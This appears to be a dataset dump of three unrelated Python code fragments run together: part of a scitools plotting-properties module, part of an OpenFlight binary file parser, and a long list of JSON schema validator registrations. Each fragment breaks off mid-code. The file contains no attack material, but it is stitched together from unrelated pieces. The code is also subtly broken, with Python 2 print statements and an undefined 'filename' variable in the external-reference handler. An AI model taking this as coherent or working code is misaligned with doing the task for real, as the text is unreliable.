input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
<gh_stars>10-100
import pickle, os, operator, pprint
from scitools.numpyutils import seq, iseq, asarray, ones, zeros, sqrt, shape, \
ravel, meshgrid, rank, squeeze, reshape, ndgrid, size, ndarray
from scitools.globaldata import backend
from .misc import _check_xyz, _check_xyuv, _check_xyzuvw, _check_xyzv, \
_check_size, _check_type, _toggle_state, _update_from_config_file
from warnings import warn
def docadd(comment, *lists, **kwargs):
"""
Format a string, intended to be appended to or inserted in a doc
string, containing a comment and a nicely formatted sequence of
lists. Typically used for adding lists of options to a doc string,
where the lists of options are available as static list data in
a class.
Example on usage:
# add to the class doc string:
__doc__ += docadd('Keywords for the setp method', list(_local_attrs.keys()))
# add to a method (get) doc string:
get.__doc__ += docadd('Keywords for the setp method',
list(BaseClass._local_attrs.keys()),
list(SomeSubClass._local_attrs.keys()))
"""
lst = []
for l in lists:
lst.extend(l)
lst.sort()
s = '\n' + comment + ':\n'
s += ' ' + pprint.pformat(lst)[1:-1] # strip off leading [ and trailing ]
# add indent:
indent = kwargs.get('indent', 4)
indent = ' '*indent
lines = s.split('\n')
for i in range(2,len(lines)): # skip first 2 lines (heading)
if lines[i].strip() != '':
lines[i] = indent + '- ' + lines[i] # add - for list syntax in some markup languages
s = '\n'.join(lines)
return s
class MaterialProperties(object):
"""
Storage of various properties for a material on a PlotProperties object.
"""
_local_prop = {
'opacity': None,
'ambient': None,
'diffuse': None,
'specular': None,
'specularpower': None,
}
_update_from_config_file(_local_prop) # get defaults from scitools.cfg
__doc__ += docadd('Keywords for the setp method', list(_local_prop.keys()))
def __init__(self, **kwargs):
self._prop = {}
self._prop.update(self._local_prop)
self.setp(**kwargs)
def __str__(self):
return pprint.pformat(self._prop)
def setp(self, **kwargs):
for key in self._prop:
if key in kwargs:
_check_type(kwargs[key], key, (int,float))
self._prop[key] = float(kwargs[key])
def getp(self, name):
try:
return self._prop[name]
except:
raise KeyError('%s.getp: no parameter with name "%s"' % \
(self.__class__.__name__, name) )
class PlotProperties(object):
"""
Storage of various properties needed for plotting, such as line types,
surface features, contour values, etc.
Different subclasses (Line, Surface, Contours) are specialized
for different kinds of plots.
All properties are stored in the dictionary self._prop.
"""
_colors = "b r g m c y k w".split() # colororder determines unset colors
_markers = "o s v + ^ x d * < > p h .".split()
_colors2markers = dict([(color, marker)
for color, marker in zip(_colors, _markers)])
_linestyles = ": -. -- -".split()
_sizes = "1 2 3 4 5 6 7 8 9".split()
_styledoc = {'y': 'yellow',
'm': 'magenta',
'c': 'cyan',
'r': 'red',
'g': 'green',
'b': 'blue',
'w': 'white',
'k': 'black',
'.': 'point',
'o': 'circle',
'x': 'x-mark',
'+': 'plus',
'*': 'star',
's': 'square',
'd': 'diamond',
'v': 'triangle (down)',
'^': 'triangle (up)',
'<': 'triangle (left)',
'>': 'triangle (right)',
'p': 'pentagram',
'h': 'hexagram',
'-': 'solid',
':': 'dotted',
'-.':'dashdot',
'--':'dashed',
}
__doc__ += 'Valid symbols::\n - Colors: %s\n - Markers: %s\n - Linestyles: %s\n - Sizes: %s\n - Styles:\n%s' % (_colors, _markers, _linestyles, _sizes, pprint.pformat(_styledoc)[1:-1])
_local_prop = {
'description': '',
'legend': '',
'xlim': (0,0), 'ylim': (0,0), 'zlim': (0,0),
'dims': (0,0,0),
'numberofpoints': 0,
'function': '', # the function that created this item
'linecolor': '',
'linewidth': '',
'linetype': '',
'linemarker': '',
'facecolor': '',
'edgecolor': '',
'pointsize': 1.0,
'material': None,
'memoryorder': 'yxz', # FIXME: this is deprecated and will be removed
'indexing': 'ij', # 'xy' is Cartesian indexing, 'ij' matrix indexing
'default_lines': 'with_markers' # 'plain'
}
_update_from_config_file(_local_prop) # get defaults from scitools.cfg
__doc__ += docadd('Keywords for the setp method', list(_local_prop.keys()))
def __init__(self, **kwargs):
self._prop = {}
self._prop.update(PlotProperties._local_prop)
self._prop['material'] = MaterialProperties()
def __str__(self):
props = {}
for key in self._prop:
prop = self._prop[key]
if isinstance(prop, (list,tuple,ndarray)) and \
len(ravel(prop)) > 3:
props[key] = '%s with shape %s' % (type(prop), shape(prop))
else:
props[key] = self._prop[key]
return pprint.pformat(props)
# repr is maybe not smart since
# >>> plot(...)
# will then return Line, Surface,
# etc which automatically gets printed.
# Better to make a dump function
# that one can call on the current figure f.ex.
#def __repr__(self):
# return self.__str__()
def dump(self):
"""Dump the parameters of this object."""
return str(self)
def setp(self, **kwargs):
"""
Set plot properties.
The method adds the argument value to the self._prop
(if the value is legal).
"""
if 'description' in kwargs:
descr = kwargs['description']
self._prop['description'] = descr
# descr is on the form 'mesh: 3D mesh' (say)
self._prop['function'] = descr.split(':')[0]
if 'legend' in kwargs:
self._prop['legend'] = str(kwargs['legend'])
if 'linewidth' in kwargs:
_check_type(kwargs['linewidth'], 'linewidth', (float,int))
self._prop['linewidth'] = float(kwargs['linewidth'])
if 'linecolor' in kwargs:
color = kwargs['linecolor']
if isinstance(color, str) and color in self._colors:
self._prop['linecolor'] = color
elif isinstance(color, (list,tuple)) and len(color) == 3:
self._prop['linecolor'] = color
else:
raise ValueError("linecolor must be '%s', not '%s'" % \
(self._colors, kwargs['linecolor']))
if 'linetype' in kwargs:
if kwargs['linetype'] in self._linestyles:
self._prop['linetype'] = kwargs['linetype']
else:
raise ValueError("linetype must be '%s', not '%s'" % \
(self._linestyles, kwargs['linetype']))
if 'linemarker' in kwargs:
if kwargs['linemarker'] in self._markers:
self._prop['linemarker'] = kwargs['linemarker']
else:
raise ValueError("linemarker must be '%s', not '%s'" % \
(self._markers, kwargs['linemarker']))
if 'facecolor' in kwargs:
self._prop['facecolor'] = kwargs['facecolor']
if 'edgecolor' in kwargs:
self._prop['edgecolor'] = kwargs['edgecolor']
if 'memoryorder' in kwargs:
msg = "Keyword argument 'memoryorder' is deprecated and will be " \
"removed in the future. Please use the 'indexing' keyword " \
"argument instead."
warn(msg, DeprecationWarning)
if kwargs['memoryorder'] == 'xyz':
self._prop['indexing'] = 'ij'
self._prop['memoryorder'] = 'xyz'
elif kwargs['memoryorder'] == 'yxz':
self._prop['indexing'] = 'xy'
self._prop['memoryorder'] = 'yxz'
else:
raise ValueError("memoryorder must be 'xyz' or 'yxz', not %s"\
% kwargs['memoryorder'])
if 'indexing' in kwargs:
if kwargs['indexing'] in ['xy', 'ij']:
self._prop['indexing'] = kwargs['indexing']
else:
raise ValueError("indexing must be 'xy' or 'ij', not '%s'" \
% kwargs['indexing'])
# set material properties:
self._prop['material'].setp(**kwargs)
def getp(self, prm_name=None):
"""
Return the value of the parameter with name prm_name.
If the name is None, the dictionary with all parameters
is returned.
"""
if prm_name == 'memoryorder':
msg = "Keyword argument 'memoryorder' is deprecated and will be " \
"removed in the future. Please use the 'indexing' keyword " \
"argument instead."
warn(msg, DeprecationWarning)
if prm_name is None:
return self._prop
else:
try:
return self._prop[prm_name]
except:
#raise KeyError('%s.getp: no parameter with name "%s"' % \
# (self.__class__.__name__, prm_name))
return None
def setformat(self, format):
"""
Extract the right values for color, linetype, marker, etc. given
a Matlab-like format string for a curve (e.g., 'r-').
The extracted values are stored in self._prop (with keys like
'linecolor', 'linetype', etc.).
Erroneous chars will be ignored.
When there are multiple format characters for a property, the last
one will count.
"""
if isinstance(format,str) and len(format) > 0:
color = ""
linetype = ""
marker = ""
linewidth = ""
pointsize = ""
# Notice that '--' and '-.' are before '-' in the _linestyles
# alphabet.
for item in self._linestyles:
if item in format:
linetype = item
break
for item in format:
if item in self._colors:
color = item
elif item in self._markers:
if item == '.':
if ('.' in linetype) and (format.count('.') == 1):
pass
else:
marker = item # same as '.'
else:
marker = item
elif item in self._sizes:
# this int describes pointsize or linewidth
self._prop['pointsize'] = item
self._prop['linewidth'] = item
if color in self._colors or color == "":
self._prop['linecolor'] = color
else:
print "Illegal line color choice, %s is not known" % color
if linetype != "" or marker != "":
if linetype in self._linestyles:
self._prop['linetype'] = linetype
elif linetype == "":
self._prop['linetype'] = linetype # Since marker is known
else:
print "Illegal line style choice, %s is not known" % \
linetype
if marker in self._markers:
self._prop['linemarker'] = marker
elif marker == "":
self._prop['linemarker'] = marker # Since linetype is known
else:
print "Illegal line marker choice, %s is not known" % \
marker
def get_limits(self):
"""
Return limits on the x, y, and z axis:
xmin, xmax, ymin, ymax, zmin, zmax.
"""
return self._prop['xlim']+self._prop['ylim']+self._prop['zlim']
def _set_lim(self, a, name, adj_step=0.03):
if isinstance(a, ndarray):
try:
amin = a.min()
| |
newObject['AltColourIdx'] = self._readUInt()
if newObject['AltColourIdx'] == -1:
newObject['AltColourIdx'] = None
self._skip(2)
newObject['ShaderIdx'] = self._readShort()
if newObject['ShaderIdx'] == -1:
newObject['ShaderIdx'] = None
self._addObject(newObject)
def _opPush(self):
# Opcode 10
if self._RecordType == "Tree":
node = self.Records["Tree"]
for idx in self._TreeStack:
node = node[idx]
self._TreeStack.append(len(node))
node.append([])
elif self._RecordType == "Instances":
node = self.Records["Instances"]
for idx in self._InstanceStack:
node = node[idx]
self._InstanceStack.append(len(node))
node.append([])
else:
raise Exception("Unable to determine stack type.")
def _opPop(self):
# Opcode 11
if self._RecordType == "Tree":
if len(self._TreeStack) == 0:
raise Exception("Tree stack is empty: nothing to pop.")
self._TreeStack.pop()
elif self._RecordType == "Instances":
self._InstanceStack.pop()
# If we pop enough times, we switch back to tree
if len(self._InstanceStack) == 1:
self._RecordType = "Tree"
self._InstanceStack = []
else:
raise Exception("Unable to determine stack type.")
def _opDoF(self):
# Opcode 14
newObject = dict()
newObject['Datatype'] = 'DegreeOfFreedom'
newObject['ASCIIID'] = self._readString(8)
# Skip over a reserved area
self._skip(4)
varNames = ['DoFOrigin', 'DoFPointx', 'DoFPointxy']
for varName in varNames:
newObject[varName] = np.zeros((1, 3))
for colIdx in range(3):
newObject[varName][0, colIdx] = self._readDouble()
varNames = ['z', 'y', 'x', 'pitch', 'roll', 'yaw', 'zScale', 'yScale', 'xScale']
variants = ['Min', 'Max', 'Current', 'Increment']
for varName in varNames:
for variant in variants:
newObject[varName + variant] = self._readDouble()
# Flags
newObject['Flags'] = self._readUInt()
self._skip(4)
self._addObject(newObject)
def _opPushSubface(self):
# Opcode 19
newObject = dict()
newObject['Datatype'] = 'PushSubface'
# Call the push command...
self._opPush()
# ... and add the push extension object
self._addObject(newObject)
def _opPopSubface(self):
# Opcode 20
newObject = dict()
newObject['Datatype'] = 'PopSubface'
# Add this object
self._addObject(newObject)
# before finally issuing a pop command
self._opPop()
def _opPushExtension(self):
# Opcode 21
newObject = dict()
newObject['Datatype'] = 'PushExtension'
self._skip(18)
newObject['VertexRefIdx'] = self._readUShort()
# Call the push command...
self._opPush()
# ... and add the push extension object
self._addObject(newObject)
def _opPopExtension(self):
# Opcode 22
newObject = dict()
newObject['Datatype'] = 'PopExtension'
self._skip(18)
newObject['VertexRefIdx'] = self._readUShort()
# Add this object
self._addObject(newObject)
# before finally issuing a pop command
self._opPop()
def _opContinuation(self):
# Opcode 23
# This function will require special handling as a continuation record extends previous records.
raise Exception("Unexpected continuation record. This should have been handled by the " + self._OpCodes[self._PreviousOpCode][2] + " function.")
def _opComment(self):
# Opcode 31
newObject = dict()
# Read the data to memory and extract data as normal with modified
# read functions
self._readChunk()
newObject['Datatype'] = 'Comment'
# Read the string to the end of the chunk
newObject['Text'] = self._readString(len(self._Chunk), fromChunk = True)
# The data chunk should be processed. Reset the variable to None:
self._Chunk = None
self._addObject(newObject)
def _opColourPalette(self):
# Opcode 32
# Read the record length
RecordLength = self._readUShort()
newObject = dict()
newObject['Datatype'] = 'ColourPalette'
# Skip a reserved area
self._skip(128)
newObject['BrightestRGB'] = np.zeros((1024, 1))
for rowIdx in range(1024):
newObject['BrightestRGB'][rowIdx, 0] = self._readUInt()
if RecordLength > 4228:
# Include colour names
# Read the number of colour names:
noNames = self._readUInt()
newObject['ColourNames'] = dict()
for colourIdx in range(noNames):
nameLength = self._readUShort()
self._skip(2)
colIdx = self._readUShort()
self._skip(2)
newObject['ColourNames'][colIdx] = self._readString(RecordLength - 8)
self._addObject(newObject)
def _opLongID(self):
# Opcode 33
newObject = dict()
newObject['Datatype'] = 'LongID'
RecordLength = self._readUShort()
newObject['ASCIIID'] = self._readString(RecordLength - 4)
self._addObject(newObject)
def _opMatrix(self):
# Opcode 49
newObject = np.zeros((4, 4))
for n in range(16):
# Enter elements of a matrix by going across their columns
newObject[int(n) / 4, n % 4] = self._readFloat()
# Inject
self._addObject(newObject)
def _opVector(self):
# Opcode 50
newObject = dict()
newObject['Datatype'] = 'Vector'
Components = ['i', 'j', 'k']
for component in Components:
newObject[component] = self._readFloat()
self._addObject(newObject)
def _opMultitexture(self):
# Opcode 52
RecordLength = self._readUShort()
newObject = dict()
newObject['Datatype'] = 'Multitexture'
newObject['Mask'] = self._readUInt()
varNames = ['TextureIndex', 'Effect', 'TextureMappingIndex', 'TextureData']
for varName in varNames:
newObject[varName] = []
for textIdx in range((RecordLength / 8) - 1):
for varName in varNames:
newObject[varName].append(self._readUShort())
self._addObject(newObject)
def _opUVList(self):
# Opcode 53
newObject = dict()
newObject['Datatype'] = 'UVList'
RecordLength = self._readUShort()
newObject['AttributeMask'] = self._readUInt()
mask = 0x00000001
flags = [False] * 7
for idx in range(7):
if newObject['AttributeMask'] & mask > 0:
flags[idx] = True
mask <<= 1
Layers = ['Layer' + str(n + 1) for n in range(7) if flags[n]]
varNames = ['U0', 'V0', 'U100', 'V100']
for vertexIdx in range((RecordLength - 8) / (8 * len(Layers))):
vertexName = 'Vertex' + str(vertexIdx)
newObject[vertexName] = dict()
for layer in Layers:
newObject[vertexName][layer] = dict()
for varName in varNames:
newObject[vertexName][layer][varName] = self._readFloat()
# Finally, commit object to stack
self._addObject(newObject)
def _opBSP(self):
# Opcode 55
newObject = dict()
newObject['Datatype'] = 'BinarySeparatingPlane'
newObject['ASCIIID'] = self._readString(8)
self._skip(4)
newObject['PlaneEquationCoeffs'] = np.zeros((1, 4))
for colIdx in range(4):
newObject['PlaneEquationCoeffs'][0, colIdx] = self._readDouble()
self._addObject(newObject)
def _opReplicate(self):
# Opcode 60
newObject = dict()
newObject['Datatype'] = 'Replicate'
newObject['NoReplications'] = self._readUShort()
# Skip over reserved space
self._skip(2)
self._addObject(newObject)
def _opInstRef(self):
# Opcode 61
# Read instance number
instance = self._readUInt()
if instance not in self.Records["Instances"]:
raise Exception("Could not find an instance to reference")
# Now add this object to the right place
self._addObject(self.Records["Instances"][instance])
def _opInstDef(self):
# Opcode 62
# Firstly, set the record type to instance definition
self._RecordType = "Instances"
# Read instance number
instance = self._readUInt()
if instance in self.Records["Instances"]:
raise Exception("Instance definition number has already been declared.")
# There are no problems. Create an instance and prepare to accept incoming data
self.Records["Instances"][instance] = []
self._InstanceStack.append(instance)
def _opExtRef(self):
# Opcode 63
newObject = dict()
newObject['Datatype'] = "ExternalReference"
newObject['ASCIIPath'] = self._readString(200)
self._skip(4)
newObject["Flags"] = self._readUInt()
newObject["BoundingBox"] = self._readUShort()
self._skip(2)
# Clean the pathname and make it usable for this system
fileName = self._cleanExternalFilename(newObject['ASCIIPath'])
# Check to see if this is the parent class:
if self._parent is None:
# Yes, this is the parent class
if fileName not in self.Records['External']:
# This has not been referenced before.
# Create a new instance of this class and read the file.
extdb = OpenFlight(fileName, verbose = self._verbose, parent = self, tabbing = self._tabbing + 1)
extdb.ReadFile()
self.Records['External'][fileName] = extdb.Records
extdb = None
else:
# This is a child class. Add this object to the parent class
if fileName not in self._parent.Records['External']:
# This has not been referenced before:
# Create a new instance of this class and read the file.
extdb = OpenFlight(fileName, verbose = self._verbose, parent = self._parent, tabbing = self._tabbing + 1)
extdb.ReadFile()
self._parent.Records['External'][filename] = extdb.Records
extdb = None
# Inject into tree
self._addObject(newObject)
def _opTexturePalette(self):
# Opcode 64
newObject = dict()
newObject['Datatype'] = "TexturePalette"
newObject['Filename'] = self._readString(200)
newObject['TexturePatternIdx'] = self._readUInt()
newObject['LocationInTexturePalette'] = np.zeros((1, 2))
for colIdx in range(2):
newObject['LocationInTexturePalette'][0, colIdx] = self._readUInt()
# Check to see if this is the parent class
if self._parent is None:
# This is the parent class. Use the local records
if newObject['Filename'] not in self.Records['External']:
# This has not been referenced before.
self.Records['External'][newObject['Filename']] = self._parseTextureFile(newObject['Filename'])
else:
# This is a child class. Add this object to the parent class
if newObject['Filename'] not in self._parent.Records['External']:
# This has not been referenced before:
self._parent.Records['External'][newObject['Filename']] = self._parseTextureFile(newObject['Filename'])
self._addObject(newObject)
# Next append to the textures list.
self.Records['Textures'].append(newObject)
def _opVertexPalette(self):
# Opcode 67
newObject = dict()
newObject['Datatype'] = "VertexPalette"
newObject['Length'] = self._readUInt()
self._addObject(newObject)
self._VertexCounter += 8
def _opVertexColour(self):
# Opcode 68
newObject = dict()
newObject['Datatype'] = "VertexColour"
newObject['ColourNameIdx'] = self._readUShort()
newObject['Flags'] = self._readUShort()
newObject['Coordinate'] = np.zeros((1, 3))
# For x, y and z
for colIdx in range(3):
newObject['Coordinate'][0, colIdx] = self._readDouble()
newObject['PackedColour'] = self._readUInt()
newObject['VertexColourIndex'] = self._readUInt()
self._addObject(newObject)
self.Records['Vertices'][self._VertexCounter] = newObject
self.Records['VertexUV'].append(None)
| |
self.json_schema_validators['jsd_fc9a4ee495785518bd2251b6b4fb41f4_v3_0_0'] =\
JSONSchemaValidatorFc9A4Ee495785518Bd2251B6B4Fb41F4_v3_0_0()
self.json_schema_validators['jsd_ff0055f9ef115a42bea6ffdd8e57d41b_v3_0_0'] =\
JSONSchemaValidatorFf0055F9Ef115A42Bea6Ffdd8E57D41B_v3_0_0()
if version == '3.1.0':
self.json_schema_validators['jsd_f2fcf04554db9ea4cdc3a7024322_v3_1_0'] =\
JSONSchemaValidatorF2FcF04554Db9Ea4Cdc3A7024322_v3_1_0()
self.json_schema_validators['jsd_de7c6f75f68b0d7df00dc72808d_v3_1_0'] =\
JSONSchemaValidatorDe7C6F75F68B0D7Df00Dc72808D_v3_1_0()
self.json_schema_validators['jsd_b050fff6a5302ace3e16674c8b19a_v3_1_0'] =\
JSONSchemaValidatorB050FFf6A5302Ace3E16674C8B19A_v3_1_0()
self.json_schema_validators['jsd_a5a26c964e53b3be3f9f0c103f304c_v3_1_0'] =\
JSONSchemaValidatorA5A26C964E53B3Be3F9F0C103F304C_v3_1_0()
self.json_schema_validators['jsd_eb42e79d5cc38bd1a6eef20613d6_v3_1_0'] =\
JSONSchemaValidatorEb42E79D5Cc38Bd1A6Eef20613D6_v3_1_0()
self.json_schema_validators['jsd_c21f51995bff8d6468a1e9c0b2e9_v3_1_0'] =\
JSONSchemaValidatorC21F51995Bff8D6468A1E9C0B2E9_v3_1_0()
self.json_schema_validators['jsd_db1d9dda53369e35d33138b29c16_v3_1_0'] =\
JSONSchemaValidatorDb1D9Dda53369E35D33138B29C16_v3_1_0()
self.json_schema_validators['jsd_be5b1e320e55f4a181370417471d9e_v3_1_0'] =\
JSONSchemaValidatorBe5B1E320E55F4A181370417471D9E_v3_1_0()
self.json_schema_validators['jsd_ae4af25df565334b20a24c4878b68e4_v3_1_0'] =\
JSONSchemaValidatorAe4Af25Df565334B20A24C4878B68E4_v3_1_0()
self.json_schema_validators['jsd_d39172f68fd5cbd897f03f1440f98a4_v3_1_0'] =\
JSONSchemaValidatorD39172F68Fd5Cbd897F03F1440F98A4_v3_1_0()
self.json_schema_validators['jsd_df78c9a3f72584dbd1c7b667b0e312f_v3_1_0'] =\
JSONSchemaValidatorDf78C9A3F72584DBd1C7B667B0E312F_v3_1_0()
self.json_schema_validators['jsd_c23243c950f29b51f502c03d7058_v3_1_0'] =\
JSONSchemaValidatorC23243C950F29B51F502C03D7058_v3_1_0()
self.json_schema_validators['jsd_a518d5655f69e8687c9c98740c6_v3_1_0'] =\
JSONSchemaValidatorA518D5655F69E8687C9C98740C6_v3_1_0()
self.json_schema_validators['jsd_ca61ff725fedb94fba602d7afe46_v3_1_0'] =\
JSONSchemaValidatorCa61Ff725FedB94FBa602D7Afe46_v3_1_0()
self.json_schema_validators['jsd_ebcdc835e9b8d6844c1da6cf252_v3_1_0'] =\
JSONSchemaValidatorEbcDc835E9B8D6844C1Da6Cf252_v3_1_0()
self.json_schema_validators['jsd_bc936bcb25464b9f3f227647b0443_v3_1_0'] =\
JSONSchemaValidatorBc936Bcb25464B9F3F227647B0443_v3_1_0()
self.json_schema_validators['jsd_b05e80058df96e685baa727d578_v3_1_0'] =\
JSONSchemaValidatorB05E80058Df96E685Baa727D578_v3_1_0()
self.json_schema_validators['jsd_a66f9651fca28e85b97cf1b968_v3_1_0'] =\
JSONSchemaValidatorA66F9651FcA28E85B97Cf1B968_v3_1_0()
self.json_schema_validators['jsd_b4e8d45639975c226dacd53e7b_v3_1_0'] =\
JSONSchemaValidatorB4E8D45639975C226Dacd53E7B_v3_1_0()
self.json_schema_validators['jsd_e6d1b224e058288a8c4d70be72c9a6_v3_1_0'] =\
JSONSchemaValidatorE6D1B224E058288A8C4D70Be72C9A6_v3_1_0()
self.json_schema_validators['jsd_f6de5797735bbd95dc8683c6a7aebf_v3_1_0'] =\
JSONSchemaValidatorF6De5797735Bbd95Dc8683C6A7Aebf_v3_1_0()
self.json_schema_validators['jsd_a693347bdd15bb19d69a75f088498ce_v3_1_0'] =\
JSONSchemaValidatorA693347Bdd15Bb19D69A75F088498Ce_v3_1_0()
self.json_schema_validators['jsd_b40ad23ab0a5a7b8adade320c8912e7_v3_1_0'] =\
JSONSchemaValidatorB40Ad23Ab0A5A7B8AdaDe320C8912E7_v3_1_0()
self.json_schema_validators['jsd_c0689e940ba5526946ad15976cc3365_v3_1_0'] =\
JSONSchemaValidatorC0689E940Ba5526946AD15976Cc3365_v3_1_0()
self.json_schema_validators['jsd_cab8440e21553c3a807d23d05e5e1aa_v3_1_0'] =\
JSONSchemaValidatorCab8440E21553C3A807D23D05E5E1Aa_v3_1_0()
self.json_schema_validators['jsd_d0290eb241f5bd79221afc8d6cb32da_v3_1_0'] =\
JSONSchemaValidatorD0290Eb241F5Bd79221Afc8D6Cb32Da_v3_1_0()
self.json_schema_validators['jsd_d17bf558051575aba9f7435c7fcbe05_v3_1_0'] =\
JSONSchemaValidatorD17Bf558051575ABa9F7435C7Fcbe05_v3_1_0()
self.json_schema_validators['jsd_d79b507bda155c180d42f0a67ef64d5_v3_1_0'] =\
JSONSchemaValidatorD79B507Bda155C180D42F0A67Ef64D5_v3_1_0()
self.json_schema_validators['jsd_dbe47028859573988880de76fec0936_v3_1_0'] =\
JSONSchemaValidatorDbe47028859573988880De76Fec0936_v3_1_0()
self.json_schema_validators['jsd_f15d19b858d59218ab56b7323ca2fae_v3_1_0'] =\
JSONSchemaValidatorF15D19B858D59218Ab56B7323Ca2Fae_v3_1_0()
self.json_schema_validators['jsd_fc1c74b35ae5050b4f7fd702570ad5b_v3_1_0'] =\
JSONSchemaValidatorFc1C74B35Ae5050B4F7Fd702570Ad5B_v3_1_0()
self.json_schema_validators['jsd_eb6323be425816a4116eea48f16f4b_v3_1_0'] =\
JSONSchemaValidatorEb6323Be425816A4116Eea48F16F4B_v3_1_0()
self.json_schema_validators['jsd_fc6670fd50dfb04b1f6b16981256_v3_1_0'] =\
JSONSchemaValidatorFc6670Fd50DfB04B1F6B16981256_v3_1_0()
self.json_schema_validators['jsd_f8082b07ce528f82545e210b84d7de_v3_1_0'] =\
JSONSchemaValidatorF8082B07Ce528F82545E210B84D7De_v3_1_0()
self.json_schema_validators['jsd_cb625d5ad0ad76b93282f5818a_v3_1_0'] =\
JSONSchemaValidatorCb625D5Ad0Ad76B93282F5818A_v3_1_0()
self.json_schema_validators['jsd_f78898b7d655b2b81085dc7c0a964e_v3_1_0'] =\
JSONSchemaValidatorF78898B7D655B2B81085Dc7C0A964E_v3_1_0()
self.json_schema_validators['jsd_a746755c588c928d15a59f8a693d_v3_1_0'] =\
JSONSchemaValidatorA746755C588C928D15A59F8A693D_v3_1_0()
self.json_schema_validators['jsd_c288192f954309b4b35aa612ff226_v3_1_0'] =\
JSONSchemaValidatorC288192F954309B4B35Aa612Ff226_v3_1_0()
self.json_schema_validators['jsd_a4d5b5da6a50bfaaecc180543fd952_v3_1_0'] =\
JSONSchemaValidatorA4D5B5Da6A50BfAaecC180543Fd952_v3_1_0()
self.json_schema_validators['jsd_a99695fd5ee0b00efce79a5761ff_v3_1_0'] =\
JSONSchemaValidatorA99695Fd5Ee0B00EFce79A5761Ff_v3_1_0()
self.json_schema_validators['jsd_da0a59db7654cfa89df49ca3ac3414_v3_1_0'] =\
JSONSchemaValidatorDa0A59Db7654CfA89DF49Ca3Ac3414_v3_1_0()
self.json_schema_validators['jsd_a31eb33e3535754b3f754a9199e0d25_v3_1_0'] =\
JSONSchemaValidatorA31Eb33E3535754B3F754A9199E0D25_v3_1_0()
self.json_schema_validators['jsd_acfdb4060de5a1895b383238c205986_v3_1_0'] =\
JSONSchemaValidatorAcfdb4060De5A1895B383238C205986_v3_1_0()
self.json_schema_validators['jsd_b94d7d3f0ed5d0b938151ae2cae9fa4_v3_1_0'] =\
JSONSchemaValidatorB94D7D3F0Ed5D0B938151Ae2Cae9Fa4_v3_1_0()
self.json_schema_validators['jsd_b994e6c8b8d53f29230686824c9fafa_v3_1_0'] =\
JSONSchemaValidatorB994E6C8B8D53F29230686824C9Fafa_v3_1_0()
self.json_schema_validators['jsd_d8c7ba0cb8f56d99135e16d2d973d11_v3_1_0'] =\
JSONSchemaValidatorD8C7Ba0Cb8F56D99135E16D2D973D11_v3_1_0()
self.json_schema_validators['jsd_ea2c4586b845888b2a9375126f70de2_v3_1_0'] =\
JSONSchemaValidatorEa2C4586B845888B2A9375126F70De2_v3_1_0()
self.json_schema_validators['jsd_eb3472c4de150828b2dae61e2285313_v3_1_0'] =\
JSONSchemaValidatorEb3472C4De150828B2DAe61E2285313_v3_1_0()
self.json_schema_validators['jsd_e07cb8ea65820863cce345c67926b_v3_1_0'] =\
JSONSchemaValidatorE07Cb8Ea65820863CCe345C67926B_v3_1_0()
self.json_schema_validators['jsd_fc7103b05336a7960d9f34033eca_v3_1_0'] =\
JSONSchemaValidatorFc7103B05336A7960D9F34033Eca_v3_1_0()
self.json_schema_validators['jsd_edfca30e8e514d9bab840c3c2d4c0f_v3_1_0'] =\
JSONSchemaValidatorEdfca30E8E514D9Bab840C3C2D4C0F_v3_1_0()
self.json_schema_validators['jsd_e380a5c1d585ab9012874ca959982_v3_1_0'] =\
JSONSchemaValidatorE380A5C1D585AB9012874Ca959982_v3_1_0()
self.json_schema_validators['jsd_c5c9b7ab72b5442ae7026a5dcc0fec3_v3_1_0'] =\
JSONSchemaValidatorC5C9B7AB72B5442Ae7026A5Dcc0Fec3_v3_1_0()
self.json_schema_validators['jsd_c5cad090a875d9d8bd87e59654c9d75_v3_1_0'] =\
JSONSchemaValidatorC5Cad090A875D9D8Bd87E59654C9D75_v3_1_0()
self.json_schema_validators['jsd_e38d10b1ea257d49ebce893e87b3419_v3_1_0'] =\
JSONSchemaValidatorE38D10B1Ea257D49EbcE893E87B3419_v3_1_0()
self.json_schema_validators['jsd_e81b5f00f35577dbad11186f70f25be_v3_1_0'] =\
JSONSchemaValidatorE81B5F00F35577DBad11186F70F25Be_v3_1_0()
self.json_schema_validators['jsd_fd9e7e03a6056d1b6e9705e3096d946_v3_1_0'] =\
JSONSchemaValidatorFd9E7E03A6056D1B6E9705E3096D946_v3_1_0()
self.json_schema_validators['jsd_c4fada6c558d9aba09cc373d5b266_v3_1_0'] =\
JSONSchemaValidatorC4FadA6C558D9Aba09Cc373D5B266_v3_1_0()
self.json_schema_validators['jsd_b11e2f1af656bcb5880a7b33720ec5_v3_1_0'] =\
JSONSchemaValidatorB11E2F1Af656BcB5880A7B33720Ec5_v3_1_0()
self.json_schema_validators['jsd_ce666e64a958229cfd8da70945935e_v3_1_0'] =\
JSONSchemaValidatorCe666E64A958229Cfd8Da70945935E_v3_1_0()
self.json_schema_validators['jsd_19d9509db339e3b27dc56b37_v3_1_0'] =\
JSONSchemaValidator19D9509DB339E3B27Dc56B37_v3_1_0()
self.json_schema_validators['jsd_fb9c22ad9a5eddb590c85abdab460b_v3_1_0'] =\
JSONSchemaValidatorFb9C22Ad9A5EddB590C85Abdab460B_v3_1_0()
self.json_schema_validators['jsd_fd729f50e65695966359b589a1606b_v3_1_0'] =\
JSONSchemaValidatorFd729F50E65695966359B589A1606B_v3_1_0()
self.json_schema_validators['jsd_fac48e5c63abfe2feec6fd1903_v3_1_0'] =\
JSONSchemaValidatorFaC48E5C63Abfe2Feec6Fd1903_v3_1_0()
self.json_schema_validators['jsd_cf65cd559628b26f6eb5ea20f14_v3_1_0'] =\
JSONSchemaValidatorCf65Cd559628B26F6Eb5Ea20F14_v3_1_0()
self.json_schema_validators['jsd_a0db9ec45c05879a6f016a1edf54793_v3_1_0'] =\
JSONSchemaValidatorA0Db9Ec45C05879A6F016A1Edf54793_v3_1_0()
self.json_schema_validators['jsd_d67f9f6fba65dcbbcf64ca3e31b39a6_v3_1_0'] =\
JSONSchemaValidatorD67F9F6Fba65DcbBcf64Ca3E31B39A6_v3_1_0()
self.json_schema_validators['jsd_e6c7251a8508597f1b7ae61cbf953_v3_1_0'] =\
JSONSchemaValidatorE6C7251A8508597F1B7Ae61Cbf953_v3_1_0()
self.json_schema_validators['jsd_dd838b268f5dd298a123ac58448ea9_v3_1_0'] =\
JSONSchemaValidatorDd838B268F5Dd298A123Ac58448Ea9_v3_1_0()
self.json_schema_validators['jsd_fd28158d85d37ab1a1d616c56448c_v3_1_0'] =\
JSONSchemaValidatorFd28158D85D37Ab1A1D616C56448C_v3_1_0()
